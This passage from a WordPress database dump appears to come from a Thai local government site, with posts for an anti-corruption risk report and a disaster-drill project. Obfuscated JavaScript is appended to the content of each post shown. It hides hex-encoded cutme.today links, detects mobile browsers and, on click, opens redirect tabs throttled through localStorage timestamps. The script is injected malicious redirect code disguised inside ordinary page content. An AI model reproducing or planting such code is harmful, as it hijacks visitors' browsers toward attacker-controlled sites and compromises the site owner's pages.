_0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี','','inherit','closed','closed','','1020-revision-v1','','','2024-08-21 09:35:25','2024-08-21 02:35:25','',1020,'http://pakhaeng.ssk.in.th/?p=1026',0,'revision','',0),
(1027,1,'2024-08-21 09:35:41','2024-08-21 02:35:41','<!-- wp:file {\"id\":1025,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี\"></object><a id=\"wp-block-file--media-f4be8a42-d6b4-4952-b680-5b1f499ece36\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\" target=\"_blank\" rel=\"noreferrer noopener\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-f4be8a42-d6b4-4952-b680-5b1f499ece36\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี','','inherit','closed','closed','','1020-revision-v1','','','2024-08-21 09:35:41','2024-08-21 02:35:41','',1020,'http://pakhaeng.ssk.in.th/?p=1027',0,'revision','',0),
(1029,1,'2024-08-21 09:57:03','2024-08-21 02:57:03','<!-- wp:image {\"id\":1030,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/30-2567-724x1024.png\" alt=\"\" class=\"wp-image-1030\"/></figure>\n<!-- /wp:image -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','โครงการโครงการซ้อมแผนปฏิบัติการป้องกันและบรรเทาสาธารณะภัย ประจำปีงบประมาณ 2567','','publish','closed','closed','','%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%82%e0%b8%84%e0%b8%a3%e0%b8%87%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%8b%e0%b9%89%e0%b8%ad%e0%b8%a1%e0%b9%81%e0%b8%9c%e0%b8%99%e0%b8%9b','','','2024-08-21 09:57:04','2024-08-21 02:57:04','',0,'http://pakhaeng.ssk.in.th/?p=1029',0,'post','',0),
(1030,1,'2024-08-21 09:56:45','2024-08-21 02:56:45','','30-2567','','inherit','','closed','','30-2567','','','2024-08-21 09:56:45','2024-08-21 02:56:45','',1029,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/30-2567.png',0,'attachment','image/png',0),
